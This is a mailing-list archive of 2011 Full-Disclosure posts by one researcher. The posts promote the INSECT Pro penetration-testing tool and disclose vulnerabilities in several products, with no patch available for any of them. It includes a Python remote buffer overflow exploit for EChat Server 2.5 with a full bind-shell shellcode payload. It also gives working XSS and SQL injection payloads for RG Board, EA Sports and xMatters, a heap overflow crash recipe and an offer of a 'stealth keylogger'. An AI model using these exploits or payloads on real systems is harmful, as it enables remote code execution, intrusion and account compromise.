Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Exploit EChat Server = v2.5 20110812 - Remote Buffer Overflow Exploit

2011-08-12 Thread Juan Sacco
Information

Name : EChat Server = v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) jsacco [at] insecurityresearch [dot] 
com

Description
--

EChat Server is prone to a remote buffer-overflow vulnerability because 
it fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue will allow an attacker to execute 
arbitrary code within the context of the affected application. Failed 
exploit attempts will result in a denial-of-service condition.


Exploit example as follow
-

#!/usr/bin/python
# Easy Chat Server Server = v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsa...@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3

import string, sys
import socket, httplib
import telnetlib

def howtousage():
   print Sorry, required arguments: Host Port
   sys.exit(-1)

def run():
   try:
 # Basic structure: JUNK + NSEH + SEH + SHELLCODE
 Junk = '\x41' * 216 # 216 bytes of A
 nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
 SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret

 # ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
 ShellCode = (
 \x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43
 \x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34
 \x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41
 \x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58
 \x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30
 \x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45
 \x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b
 \x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51
 \x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c
 \x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54
 \x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b
 \x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c
 \x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51
 \x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51
 \x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54
 \x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e
 \x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30
 \x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47
 \x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31
 \x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45
 \x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30
 \x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51
 \x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a
 \x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47
 \x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f
 \x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e
 \x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34
 \x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b
 \x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50
 \x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b
 \x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48
 \x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54
 \x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57
 \x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50
 \x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58
 \x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c
 \x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f
 \x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a
 \x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42
 \x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51
 \x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50
 \x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56
 \x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46
 \x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c
 \x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38
 \x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b
 \x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d
 \x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b
 \x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43
 \x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41
 \x41)
 ShellCodePort = 
 CraftedBuffer = Junk + nSEH + SEH + ShellCode
 vulnerableURL = '/chat.ghp?username=' + CraftedBuffer + 
'password=nullroom=1null=2'

 Connection = httplib.HTTPConnection(Host, Port)
 Connection.request('GET', vulnerableURL

[Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

2011-08-02 Thread Juan Sacco
INSECT Pro 2.6.1 is worldwide available right now

Check the new cool features: http://www.youtube.com/watch?v=EcgPMyjHVbQ

* Run Faster: Because to make a good security testing is not enough
* Load Better: Major graphical interface and optimisation features were 
implemented
* Module Search: This version includes a new built-in search feature
* Improvements and Changes: Many more optimisations and updates were 
added
* Lots of bugs were patched

Start here: http://www.insecurityresearch.com

Regards
Juan Sacco

--
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Advisory 2011 0628 - SQL Injection - XSS - RGBoard 2.2

2011-06-28 Thread Juan Sacco
 Information
 
 Name : SQL Injection and XSS discovered
 Software : RG Board 2.2
 Vendor Homepage : http://www.rgboard.com/
 Vulnerability Type : SQL injection and XSS reflected
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 RG Board 2.2 is prone to a SQL Injection and XSS reflected 
 vulnerabilitys because the application fails to properly perform 
 adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to compromise the victim's machine.

 Details
 ---
 SQL injection is a code injection technique that exploits a security 
 vulnerability occurring in the database layer of an application (like 
 queries).

 Cross-site scripting (XSS) is a type of computer security vulnerability 
 typically found in web applications that enables attackers to inject 
 client-side script into web pages viewed by other users.

 Exploit example as follow
 -

 SQL Injection:
 
http://target.com/main/view.php?bbs_code=[injectme]bd_num=106kw=ss[sc]=1ss[st]=1
 This vulnerability affects /main/view.php using method GET

 XSS:
 
http://target.com/main/list.php?bbs_code=newspage=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e

 The vulnerability is caused by the following code:
 form id=category_form action=? method=get 
 enctype=multipart/form-data
 p id=ba_content_list_topinput type=hidden name=bbs_code 
 value=news /
 span class=floating_leftCategory: select name=ss[cat] 
 onchange=this.form.submit();
 option value=All/option
 option value=7News/option
 option value=8PR/option
 option value=9Video/option
 /select/span span class=floating_rightTotal : 47 (1ScRiPt 
 alert(/XSS/)/ScRiPt/3)/span/p
 /form


 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-22 Thread Juan Sacco
 Test your network security and audit your website using the same tools 
 as hackers.
 INSECT Pro 2.6.1 is available for purchase right now worldwide through 
 PayPal!

 * Run Faster: You not only want to make great security testing, you 
 want a nice performance
 * Load Better: Major graphical interface and optimizations features
 * Module Search: Ever wondered where that module? We have a built-in 
 search feature for you
 * Improvements, and Changes As always, we've added a lot of other 
 features and optimizations
 * The latest exploits found in the wild

 We are always trying to be one step ahead of the competition, take a 
 visual tour of some of INSECT Pro most popular features and discover 
 INSECT Pro today!

 Start here: http://www.insecurityresearch.com

 Regards
 Juan Sacco
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 INSECT Pro 2.6.1 on track - Stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] INSECT Pro - Advisory 2011 0620 - Zero Day - XSS Persistent in EA Sports

2011-06-20 Thread Juan Sacco
 Information
 
 Name : XSS Persistent in EA Sports
 Software : EA Sports Main site
 Vendor Homepage : http://www.ea.com
 Vulnerability Type : XSS Persistent
 Severity : Very High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 EA Sports is prone to a XSS Stored vulnerability because the 
 application fails to properly perform adequate boundary checks on 
 user-supplied data.
 An attacker can exploit this issue to execute arbitrary code in the 
 victim's machine.

 Details
 ---
 The persistent (or stored) XSS vulnerability is a more devastating 
 variant of a cross-site scripting flaw: it occurs when the data provided 
 by the attacker is saved by the server, and then permanently displayed 
 on normal pages returned to other users in the course of regular 
 browsing, without proper HTML escaping. A classic example of this is 
 with online message boards where users are allowed to post HTML 
 formatted messages for other users to read

 Exploit example as follow
 -
 Vulnerable web site
 http://www.ea.com/soccer/profile/biography/cem_ea_id/jsacco123

 The vulnerability is caused by the following code and affected by the 
 Hometown input
 li
  label class=sectionHome Town:/label
  'gt;script xml:space=preservealert(XSS discovered by INSECT 
 Pro)/script  /li
 li

 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [Security Tool] INSECT Pro 2.6.1 is here

2011-05-30 Thread Juan Sacco
 INSECT Pro 2.6.1 is here! This penetration security auditing and 
 testing software solution is designed to allow organizations of all 
 sizes mitigate, monitor and manage the latest security threats 
 vulnerabilities and implement active security policies by performing 
 penetration tests across their infrastructure and applications.

 * Run Faster: You not only want to make great security testing, you 
 want screaming performance
 * Load Better: Major graphical intergace and optimizations features 
 that we implemented
 * Module Search: Ever wondered where that module? We have a built-in 
 search feature for your project
 * Improvements, and Changes As always, we've added a slew of other 
 features and optimizations

 When is 2.6.1 available? INSECT Pro 2.6.1 is available for purchase 
 right now via PayPal!

 We are always trying to be one step ahead of the competition, take a 
 visual tour of some of INSECT Pro most popular features and discover why 
 INSECT Pro has become a leader in security software and solutions around 
 the globe. Start your tour here: http://www.insecurityresearch.com

 Regards
 Juan Sacco
 --
 
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 INSECT Pro 2.6.1 on track - Stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint

2011-04-28 Thread Juan Sacco
 Information
 
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 ---
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follow:
 Insert new HTTP API with the following malicious code:
 ?xml version=1.0?
 transaction version=1.0
header
methodAlive/method
/header
data
agent_client_idping/agent_client_id
/data
 /transaction'scriptalert(/XSS/)/script

 Go to: http://example.com:2010/agent/status.html
 Reponse:
 AgentStatus
 3.2.1 (Build 
 
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'scriptalert(/XSS/)/script

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

2011-04-28 Thread Juan Sacco
 Information
 
 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High
 Researcher : Juan Sacco jsacco [at] insecurityresearch [dot] com

 Description
 --
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 ---
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follow:
 Submit a malicious file cointaining the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print \x90*16287'`
 Starting program: 
 /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 
 'print \x90*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax0xa303924170932516
 ecx0xbfb8   49080
 edx0xa303924170932516
 ebx0x8059438134583352
 esp0xbfff3620   0xbfff3620
 ebp0xbfff3638   0xbfff3638
 esi0x8059440134583360
 edi0x80653f0134632432
 eip0x804be8a0x804be8a free+126
 eflags 0x210206 [ PF IF RF ID ]
 cs 0x73 115
 ss 0x7b 123
 ds 0x7b 123
 es 0x7b 123
 fs 0x0  0
 gs 0x33 51
 (gdb)


 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Insect Pro 2.1 : New version release

2011-03-08 Thread Juan Sacco
 The Insect Pro 2.1 new version is now accessible on Insecurity Research 
 servers!
 Get it now to enjoy the positive changes that this update brings, based 
 directly on user feedback

 Insect Pro is a penetration security auditing and testing software 
 solution designed to allow organizations of all sizes mitigate, monitor 
 and manage the latest security threats vulnerabilities and implement 
 active security policies by performing penetration tests across their 
 infrastructure and applications.

 Insect Pro 2.1 includes:
 Minimize to systray to work in background
 Video recording
 Capture screenshots
 Keylogging feature
 Command-line based control
 GUI improved

 Read full patch notes on our site to learn more about what's new and 
 improved.

 Also, anyone that has not yet donate to get a license may do it now and 
 obtain a free version of the new stealth keylogger!

 Juan Sacco
-- 
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.1 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-27 Thread Juan Sacco
Hey Steve, Thanks for your time. Probably this tool is not meant for you,
since you use metasploit, I wasnt trying to reinvent the wheel, This tool is
oriented to people with basic security skills, that need a way to do pentest
to their sites among many other possibilities.

Thanks again, dont forget to donate because you didnt But Im ok with
that :-)

Juan Sacco

On Wed, Jan 26, 2011 at 3:33 PM, Steve Pinkham steve.pink...@gmail.comwrote:

 On 01/26/2011 01:25 PM, Juan Sacco wrote:
  Steve, is a lot easier get donation and rent a good hosting. Sorry Im
  going to pass your offer.
 
  Juan Sacco
 

 Sure, I understand.  Unfortunately, that puts you back in the liar
 catagory about whether or not the software is actually free.

 Too bad, I just wasted 20 bucks and a few hours setting up quality
 hosting, and I was looking forward to trying out a new tool.

 Back to metasploit for me!
 --
  | Steven Pinkham, Security Consultant|
  | http://www.mavensecurity.com   |
  | GPG public key ID CD31CAFB |




-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Juan Sacco
Hi, Troll
Thanks for your review :-)
It's a pity that the tools you refer cost from $5000 to $3 usd
INSECT Pro is a tool for penetration testing that we'd created based on the
free classes we gave here in Argentina, listening to all the obstacles
people had using tools that we love like metasploit.
BTW: We love meterpreter, that's why we use it of course. What's your
problem using it? Don't you know how to use it?
INSECT PRO 2.0 is free, we only ask for a minimum donation to maintain the
ftp and the web-site online.

Juan Sacco
-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned



On Tue, Jan 25, 2011 at 7:45 PM, R0me0 *** knight@gmail.com wrote:

 I think that this tool is a BIG bullshit, and only serves to noobs and
 lammers, and too exists others tools that deserve respect
 SAINT, CORE IMPACT and other and of course !  THE METASPLOIT FRAMEWORK ( U
 use the meterpreter in your tool)

 Regards,

 spawn



 2011/1/25 Roger rno...@gmail.com

 Too late. I already sent that information to the FBI for prime
 factorisation.

 -r

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

2011-01-26 Thread Juan Sacco
Steve, yes you can! :-)

Let me know by email when you are ready! and I hope you could make a
personal review of Insect Pro 2.0 when you get a copy :P

BTW I will change that word licence is consufing i guess,

Thanks for support our software

Juan Sacco

-- 
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.0 was released stay tunned


On Wed, Jan 26, 2011 at 1:27 AM, Steve Pinkham steve.pink...@gmail.comwrote:

 On 01/25/2011 10:06 PM, runlvl wrote:
  From our download section:
 http://www.insecurityresearch.com/?page_id=926
 
  make a donation of minimum: $20 ( US Dollars )
 
  This helps us to maintain Insect Pro and the whole site!
 
  Steve,
 
  Im sorry, we cant afford the proyect ( ftp bandwich and http server ),
  luckily a lot of people are trusting on us, so we can continue with this
  tool. Thumbs up! :-)
 
  Juan Sacco

 I repeat: If I'm just paying for download access, can I pay $20,
 download it, then host if for others to download for free.  If not, it's
 paying for licensing, not download bandwidth.  Also, I repeat, YOUR OWN
 SITE says you are paying for a license, not download access.

 Quote from the page we both linked to:
  After you make the donation please write us an email to
  don...@insecurityresearch.com with your full name and we will send
  you the user and password for your new license.

 Put up or shut up time: I will pay to host the download on my own server
 for the next 6 months if the product license allows it(and it legal for
 me to do so as not infringing copyright, etc), or you need to stop
 claiming it is free.

 So, can I redistribute it for free, or are you a liar?


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/